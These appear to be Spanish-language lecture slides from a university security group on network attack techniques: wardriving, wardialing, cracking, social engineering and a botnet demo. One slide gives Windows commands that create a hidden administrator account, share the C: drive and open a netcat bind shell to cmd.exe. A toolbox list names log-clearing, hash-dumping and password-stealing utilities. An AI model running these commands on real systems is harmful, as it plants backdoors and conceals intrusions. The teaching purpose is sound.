Seguridad Informática
description
Transcript of Seguridad Informática
TÉCNICAS DE ATAQUE EN
SEGURIDAD INFORMÁTICA
Grupo de I+D en Tecnologías de la Información (GTI)
(Esp) Siler Amador Donado
http://gseguridad.unicauca.edu.co
AGENDA
Hackers vs Crackers
El riesgo en la seguridad informática
Pérdidas económicas por ataques informáticos
Técnicas de ataque
Vectores de ataque a una red
Y si tienen la oportunidad…
Caja de herramientas de ataque
La próxima generación de Troyanos Keylogers
Demo (Ataque Masivo)
… Y en la Unicauca que?
Conclusiones
HACKERS VS CRACKERS
Hackers Crackers
EL RIESGO EN LA SEGURIDAD
INFORMÁTICA
PÉRDIDAS POR ATAQUES
CCS/FBI
PÉRDIDAS POR ATAQUES
CCS/FBI
$67.2 billones por año
$7.6 millones por hora
TECNICAS DE ATAQUE
Wardriving: Nombre que recibe la búsqueda de redes
inalámbricas para documentar su posición. Para realizar estabúsqueda se necesita como mínimo un equipo móvil (portátil) contarjeta Wireless, y si queremos que la posición sea precisa, un GPSpara pasar los datos a un mapa.
Objetivo: Conectarse al punto de acceso (AP) mal configurado e
ingresar a la la red local de la empresa.
Herramientas: NetStumbler
Kismet
http://www.wardrive.net/wardriving/tools
TECNICAS DE ATAQUE
Wardialing: Fue una técnica de los 80´s y 90´s, consitía en
marcar repetidamente a modems y PBX´s disponibles en la red y de
esta forma irrumpir a sistemas remotos.
Objetivo: Conectarse a modems o PBX´s mal configurados e
ingresar a la la red local de la empresa.
Herramientas: THC-Scan 2.0
ModemScan
ShokDial
TECNICAS DE ATAQUE
Cracking: Modificar un programa para obtener beneficios.
Normalmente se basa en quitar pantallas introductorias,
protecciones o, como en unas modificaciones de cierto programa de
comunicaciones, conseguir nuevos passwords de acceso a
sistemas.
Objetivo:Tener acceso al software o a la red interna.
Herramientas: Las 100 mejores http://sectools.org/
Inyección SQL
XSS
TECNICAS DE ATAQUE
Ing. Social: Persuadir a otra persona (a través de diversasformas) para que nos de un dato útil para cumplir un objetivo. Estedato puede ser un password, un código, etc. incluso pueden darnombres de familiares y fechas importantes, que siempre se usanpara formar claves.
Objetivo: Obtener información sensible que nos permita elacceso a la red.
Herramientas: Teléfono
Mucha psicología
Inteligencia emocional http://www.laflecha.net/perfiles/tecnologia/kevin_mitnick/
VECTORES DE ATAQUE A UNA RED
Puntos de acceso
INT
ER
NE
T MO
DE
MWIRELESS
FISICO
RED
Wardriving
Ing. Social
Ward
ialin
gCra
ckin
g
Y si tienen la oportunidad…
Menos de 1 minuto es suficiente para:
1. Crear una cuenta con privilegios de Admin!!!1. Abrir la consola de comandos
2. C:\net user fusm2010 fusm2010 /add
3. C:\net localgroup administradores fusm2010 /add
2. Compartir toda la unidad del disco!!!1. C:\net share fusm2010=c:\ /remark:”Demo fusm2010”
3. Colocar un programa en escucha!!!1. http://gseguridad.unicauca.edu.co/nc.exe
2. C:\WINNT\System32\nc.exe -d -L -p 55555 -e cmd.exe
Caja de Herramientas de ataque en
línea de comandos
fport.exe - shows open ports and the process that owns the portiplist.exe - enumerates the ip's of the computermd5.exe - gets the md5 hash of a filepw2kget.exe - for win2k gets the password of the currently logged on userpwreveal.exe - gets the passwords of any window that has a ****** editboxregshell.exe - a commandline registry explorer/editorsendmail.exe - a commandline email senderuptime.exe - gets the machines current uptimexwhois - advanced whois lookupScreencap.exe - makes a screenshot of the screen and saves it to screenshot.bmpCMDget.exe - Downloads a file from a website from user provided parameterswebscr.exe - creates a snapshot from the webcam and saves it shutd.exe - program that forces shutdown/reboot of machinebnc.exe - bnc for windows (see bnc.cfg)clslog.exe - clears app/security/system logs XP/NT/2k enum.exe - enumerates IPC$ share to collect informationwinfo.exe - enumerates IPC$ share to collect informationFTPd.exe - small ftp server for dos (see slimftpd.conf)Global.exe - process dos command on all disc/subdirsiislog.exe - clears IIS logsInfo.exe - gets system informationispc.exe - spawns shell on hacked IIS (put idq.dll on remote script dir)nc.exe - netcatpv.exe - process manager for dosPwdump.exe - dumps SAM hashesscrnmode.exe - change screen mode from dosunrar.exe - unrar for doswget.exe - wget for windowswizmo.exe - command tool (see w.txt)dwpp.exe - dial up password graberwinrelay.exe - relay tcp/udp connectionsgetad.exe - escalate to admin user in w2kpipeup.exe - escalate to admin user in w2kdnsid - identify remore dns server
Agradecimientos a: Netranger
Tomado de: http://www.governmentsecurity.org/forum/lofiversion/index.php/t2824.html
LA PRÓXIMA GENERACION DE
TROYANOS KEYLOGERS…
http://www.hispasec.com/laboratorio/troyano_video.htm
VIDEO
EJEMPLO DE ATAQUE MASIVO
Escenario
INTERNET LAN
ATACANTE MAESTRO
ZOMBIES
Linux/Windows
Metasploit
Scripts en Python
Linux-BackTrack4
Win/XP/2K
http://www.microsoft.com/spain/technet/seguridad/boletines/ms05-039-it.mspx
... Y en la Unicauca que?
• Electiva de seguridad informática
• Área de interés en seguridad informática del GTI. (Proyectos de tesis de grado)
• Legislación en comercio electrónico (Finalizado)
• OBSES (Firewall Cluster Beowulf) (Finalizado)
• INFORCE (Finalizado)
• Antivirus-inteligente (En desarrollo)
• Estudio de las tendencias predictivas sobre la escogencia de contraseñas basado en redes bayesianas (Finalizado)
• Proyecto SGSI en UNICAUCA (En desarrollo)
• Publicaciones
Preocupación del departamento de sistemas de la FIET sobre la
problemática de la seguridad de la información en Colombia.
CONCLUSIONES
Los ataques de seguridad informática a nivel mundial sonaislados? Inversión en guerra informática? ECHELON,ENFOPOL, CARNÍVORO…• USA
• UK
• CHINA
• RUSIA
Los sistemas de seguridad actuales son reactivos y correctivos.• Preventivos
• Inteligentes
Existen demasiadas herramientas de ataque gratis ydisponibles en la red.
Las técnicas de ataque cambian constantemente.
Segun las estadísticas es muy probable que su sistemahaya sido vulnerado y usted aún no lo sepa!!!.